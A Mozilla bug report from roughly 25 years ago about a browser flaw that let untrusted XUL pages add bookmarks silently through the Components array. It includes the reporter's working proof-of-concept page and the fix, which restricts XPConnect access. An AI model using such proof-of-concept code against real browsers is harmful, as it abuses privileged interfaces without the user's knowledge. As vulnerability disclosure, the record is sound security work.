Closed
Bug 10120
Opened 25 years ago
Closed 25 years ago
Adding bookmarks without user's knowledge
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M11
People
(Reporter: joro, Assigned: norrisboyd)
References
()
Details
Mozilla 5.0 M8 Win95 (guess all platforms) allows adding bookmarks without
user's knowledge.
I do not think this is a good idea, it at least may be used as a DoS attack.
The code is:
-----------------bookm1.xul------------------------------------
<?xml version="1.0"?>
<!DOCTYPE window>
<window
xmlns:html="http://www.w3.org/TR/REC-html40"
xmlns:xul ="http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul"
title = "Adding bookmarks">
<html:script>
<![CDATA[
function ab(url, title)
{
var bmks =
Components.classes["component://netscape/browser/bookmarks-service"].getService(
);
bmks = bmks.QueryInterface(Components.interfaces.nsIBookmarksService);
bmks.AddBookmark(url, title);
}
ab('http://www.netscape.com','script #1');
ab('http://www.netscape.com','script #2');
]]>
</html:script>
<html:h3> This page adds two bookmarks without user's knowledge. Look at your
bookmarks.
</html:h3>
</window>
---------------------------------------------------------------
Assignee | ||
Updated•25 years ago
|
Status: NEW → ASSIGNED
Assignee | ||
Comment 1•25 years ago
|
||
This hole should be closed by restricting use of the Components array.
Assignee | ||
Updated•25 years ago
|
Target Milestone: M11
Assignee | ||
Updated•25 years ago
|
Assignee | ||
Comment 3•25 years ago
|
||
Currently mozilla prints "loaded successfully", but no text is displayed in the
window.
I consider this bug fixed by restricting access to the Components array - it
gives the error: "Access denied to XPConnect service" after replacing
"<window" with "<xul:window" and "</window>" with "</xul:window>" in the demo.
Assignee | ||
Updated•25 years ago
|
Status: ASSIGNED → RESOLVED
Closed: 25 years ago
Resolution: --- → FIXED
Assignee | ||
Comment 5•25 years ago
|
||
I've now checked in changes enabling XPConnect checks.
Updated•25 years ago
|
Status: RESOLVED → VERIFIED
QA Contact: dshea → junruh
Comment 6•25 years ago
|
||
Verified fixed.
Bulk moving all Browser Security bugs to new Security: General component. The
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in
before you can comment on or make changes to this bug.
Description
•